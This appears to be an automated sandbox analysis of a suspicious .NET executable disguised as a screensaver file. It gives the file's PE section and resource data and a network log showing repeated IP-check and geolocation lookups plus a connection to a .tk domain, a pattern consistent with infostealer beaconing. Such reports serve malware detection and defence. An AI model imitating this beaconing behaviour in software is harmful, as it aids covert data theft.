                                                .text0x20000x99c740x99e00142b70b6afb38c0d6ce5233ad81a773aFalse0.6303072324329814data7.276750369053607IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x9c0000x1b7c0x1c00de75c8118bc1bf4ad3c303a622710081False0.3462611607142857data5.574966851848031IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x9e0000xc0x2008f380dc079a03d92d08433751817a386False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x9c1600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.2675891181988743
                                                RT_ICON0x9d2080x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5106382978723404
                                                RT_GROUP_ICON0x9d6700x22data0.9411764705882353
                                                RT_VERSION0x9d6940x2fcdata0.43717277486910994
                                                RT_MANIFEST0x9d9900x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 27, 2024 11:24:05.321327925 CET4969980192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:05.501127005 CET8049699193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:05.501236916 CET4969980192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:05.501516104 CET4969980192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:05.681154966 CET8049699193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:05.681735992 CET8049699193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:05.712584972 CET4969980192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:05.893754959 CET8049699193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:05.942640066 CET4969980192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:06.052438021 CET49700443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.052467108 CET44349700172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:06.052555084 CET49700443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.060863972 CET49700443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.060874939 CET44349700172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:06.264913082 CET44349700172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:06.265034914 CET49700443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.272123098 CET49700443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.272133112 CET44349700172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:06.272433043 CET44349700172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:06.317677021 CET49700443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.327872038 CET49700443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.372230053 CET44349700172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:06.790426016 CET44349700172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:06.790544987 CET44349700172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:06.790608883 CET49700443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.798187971 CET49700443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.802086115 CET4969980192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:06.982444048 CET8049699193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:06.985083103 CET49701443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.985131025 CET44349701172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:06.985198021 CET49701443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.985419989 CET49701443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:06.985434055 CET44349701172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:07.036369085 CET4969980192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:07.183429003 CET44349701172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:07.185760021 CET49701443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:07.185787916 CET44349701172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:07.713412046 CET44349701172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:07.713536024 CET44349701172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:07.713603020 CET49701443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:07.714032888 CET49701443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:07.717495918 CET4969980192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:07.718532085 CET4970280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:07.899482965 CET8049699193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:07.899540901 CET4969980192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:07.900109053 CET8049702193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:07.900192022 CET4970280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:07.900430918 CET4970280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:08.080039024 CET8049702193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:08.080908060 CET8049702193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:08.082393885 CET49703443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:08.082429886 CET44349703172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:08.082493067 CET49703443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:08.082865000 CET49703443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:08.082880974 CET44349703172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:08.130130053 CET4970280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:08.283318996 CET44349703172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:08.285265923 CET49703443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:08.285291910 CET44349703172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:08.846152067 CET44349703172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:08.846255064 CET44349703172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:08.846307039 CET49703443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:08.847071886 CET49703443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:08.851450920 CET4970280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:08.852654934 CET4970480192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:09.031055927 CET8049702193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:09.031131983 CET4970280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:09.032274961 CET8049704193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:09.032461882 CET4970480192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:09.032620907 CET4970480192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:09.213268042 CET8049704193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:09.214004040 CET8049704193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:09.215281010 CET49705443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:09.215321064 CET44349705172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:09.215526104 CET49705443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:09.215811968 CET49705443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:09.215826035 CET44349705172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:09.255141973 CET4970480192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:09.420753956 CET44349705172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:09.422741890 CET49705443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:09.422770023 CET44349705172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:09.953572989 CET44349705172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:09.953699112 CET44349705172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:09.953860044 CET49705443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:09.954428911 CET49705443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:09.960139990 CET4970680192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:10.143742085 CET8049706193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:10.149022102 CET4970680192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:10.149310112 CET4970680192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:10.334395885 CET8049706193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:10.334887981 CET8049706193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:10.336222887 CET49707443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:10.336260080 CET44349707172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:10.336812973 CET49707443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:10.337167978 CET49707443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:10.337181091 CET44349707172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:10.383099079 CET4970680192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:10.536447048 CET44349707172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:10.538256884 CET49707443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:10.538299084 CET44349707172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:10.778023958 CET44349707172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:10.778126001 CET44349707172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:10.778453112 CET49707443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:10.778765917 CET49707443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:10.782998085 CET4970680192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:10.783521891 CET4970880192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:10.966515064 CET8049706193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:10.966794968 CET4970680192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:10.967082977 CET8049708193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:10.967255116 CET4970880192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:10.967328072 CET4970880192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:11.150995970 CET8049708193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:11.151983023 CET8049708193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:11.156071901 CET49709443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:11.156105042 CET44349709172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:11.156270981 CET49709443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:11.156554937 CET49709443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:11.156568050 CET44349709172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:11.192672968 CET4970880192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:11.353821039 CET44349709172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:11.355441093 CET49709443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:11.355462074 CET44349709172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:11.920686960 CET44349709172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:11.920787096 CET44349709172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:11.920840979 CET49709443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:11.921503067 CET49709443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:11.925770998 CET4970880192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:11.927170992 CET4971080192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:12.107090950 CET8049710193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:12.107961893 CET4971080192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:12.108155012 CET4971080192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:12.109441042 CET8049708193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:12.109497070 CET4970880192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:12.287821054 CET8049710193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:12.289089918 CET8049710193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:12.290379047 CET49711443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:12.290425062 CET44349711172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:12.290512085 CET49711443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:12.290733099 CET49711443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:12.290744066 CET44349711172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:12.333307981 CET4971080192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:12.488100052 CET44349711172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:12.489928007 CET49711443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:12.489953041 CET44349711172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:13.023262978 CET44349711172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:13.023370028 CET44349711172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:13.023657084 CET49711443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:13.024077892 CET49711443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:13.027620077 CET4971080192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:13.028769970 CET4971280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:13.207444906 CET8049710193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:13.209867001 CET4971080192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:13.212235928 CET8049712193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:13.213258028 CET4971280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:13.213402033 CET4971280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:13.397090912 CET8049712193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:13.397728920 CET8049712193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:13.399061918 CET49713443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:13.399100065 CET44349713172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:13.399192095 CET49713443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:13.399431944 CET49713443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:13.399445057 CET44349713172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:13.442761898 CET4971280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:13.602525949 CET44349713172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:13.604150057 CET49713443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:13.604173899 CET44349713172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:13.843760014 CET44349713172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:13.843868017 CET44349713172.67.177.134192.168.2.7
                                                Mar 27, 2024 11:24:13.843928099 CET49713443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:13.844635010 CET49713443192.168.2.7172.67.177.134
                                                Mar 27, 2024 11:24:13.858161926 CET4971280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:14.041815042 CET8049712193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:24:14.041933060 CET4971280192.168.2.7193.122.6.168
                                                Mar 27, 2024 11:24:14.199594021 CET49714443192.168.2.7104.21.27.85
                                                Mar 27, 2024 11:24:14.199641943 CET44349714104.21.27.85192.168.2.7
                                                Mar 27, 2024 11:24:14.199712992 CET49714443192.168.2.7104.21.27.85
                                                Mar 27, 2024 11:24:14.200110912 CET49714443192.168.2.7104.21.27.85
                                                Mar 27, 2024 11:24:14.200124025 CET44349714104.21.27.85192.168.2.7
                                                Mar 27, 2024 11:24:14.404936075 CET44349714104.21.27.85192.168.2.7
                                                Mar 27, 2024 11:24:14.405040979 CET49714443192.168.2.7104.21.27.85
                                                Mar 27, 2024 11:24:14.408391953 CET49714443192.168.2.7104.21.27.85
                                                Mar 27, 2024 11:24:14.408401966 CET44349714104.21.27.85192.168.2.7
                                                Mar 27, 2024 11:24:14.408628941 CET44349714104.21.27.85192.168.2.7
                                                Mar 27, 2024 11:24:14.409965992 CET49714443192.168.2.7104.21.27.85
                                                Mar 27, 2024 11:24:14.452234983 CET44349714104.21.27.85192.168.2.7
                                                Mar 27, 2024 11:24:45.768456936 CET44349714104.21.27.85192.168.2.7
                                                Mar 27, 2024 11:24:45.768523932 CET44349714104.21.27.85192.168.2.7
                                                Mar 27, 2024 11:24:45.768707037 CET49714443192.168.2.7104.21.27.85
                                                Mar 27, 2024 11:24:45.774362087 CET49714443192.168.2.7104.21.27.85
                                                Mar 27, 2024 11:25:14.217478037 CET8049704193.122.6.168192.168.2.7
                                                Mar 27, 2024 11:25:14.217581987 CET4970480192.168.2.7193.122.6.168

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 27, 2024 11:24:05.195822954 CET5027653192.168.2.71.1.1.1
                                                Mar 27, 2024 11:24:05.290826082 CET53502761.1.1.1192.168.2.7
                                                Mar 27, 2024 11:24:05.955574036 CET5131153192.168.2.71.1.1.1
                                                Mar 27, 2024 11:24:06.051738977 CET53513111.1.1.1192.168.2.7
                                                Mar 27, 2024 11:24:13.858851910 CET5621253192.168.2.71.1.1.1
                                                Mar 27, 2024 11:24:14.198926926 CET53562121.1.1.1192.168.2.7

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Mar 27, 2024 11:24:05.195822954 CET192.168.2.71.1.1.10xd2d4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Mar 27, 2024 11:24:05.955574036 CET192.168.2.71.1.1.10x2cbaStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                Mar 27, 2024 11:24:13.858851910 CET192.168.2.71.1.1.10xa1d1Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Mar 27, 2024 11:24:05.290826082 CET1.1.1.1192.168.2.70xd2d4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Mar 27, 2024 11:24:05.290826082 CET1.1.1.1192.168.2.70xd2d4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Mar 27, 2024 11:24:05.290826082 CET1.1.1.1192.168.2.70xd2d4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Mar 27, 2024 11:24:05.290826082 CET1.1.1.1192.168.2.70xd2d4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Mar 27, 2024 11:24:05.290826082 CET1.1.1.1192.168.2.70xd2d4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Mar 27, 2024 11:24:05.290826082 CET1.1.1.1192.168.2.70xd2d4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Mar 27, 2024 11:24:06.051738977 CET1.1.1.1192.168.2.70x2cbaNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                Mar 27, 2024 11:24:06.051738977 CET1.1.1.1192.168.2.70x2cbaNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                Mar 27, 2024 11:24:14.198926926 CET1.1.1.1192.168.2.70xa1d1No error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                Mar 27, 2024 11:24:14.198926926 CET1.1.1.1192.168.2.70xa1d1No error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • reallyfreegeoip.org
                                                • scratchdreams.tk
                                                • checkip.dyndns.org

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749699193.122.6.168806880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                Mar 27, 2024 11:24:05.501516104 CET151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Mar 27, 2024 11:24:05.681735992 CET322INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:05 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 6741e569576b125a69d17c6ebb747f04
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>
                                                Mar 27, 2024 11:24:05.712584972 CET127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Mar 27, 2024 11:24:05.893754959 CET322INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:05 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: a387839ce3bafaace5cc4171584b80fe
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>
                                                Mar 27, 2024 11:24:06.802086115 CET127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Mar 27, 2024 11:24:06.982444048 CET322INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:06 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: f603bcc5cdb55dea973ca6099626eacf
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.749702193.122.6.168806880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                Mar 27, 2024 11:24:07.900430918 CET127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Mar 27, 2024 11:24:08.080908060 CET322INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:07 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 751c978a30d2fc8d3421c5ea9b72c9d8
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.749704193.122.6.168806880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                Mar 27, 2024 11:24:09.032620907 CET127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Mar 27, 2024 11:24:09.214004040 CET322INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:09 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 3b42f5669eae4d64dff08b8b4b640465
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.749706193.122.6.168806880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                Mar 27, 2024 11:24:10.149310112 CET151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Mar 27, 2024 11:24:10.334887981 CET322INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 4563f6d065799dae82b35789f0be3f25
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.749708193.122.6.168806880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                Mar 27, 2024 11:24:10.967328072 CET151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Mar 27, 2024 11:24:11.151983023 CET322INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:11 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 0286eaba19cfcc1aeffa75199429ad1b
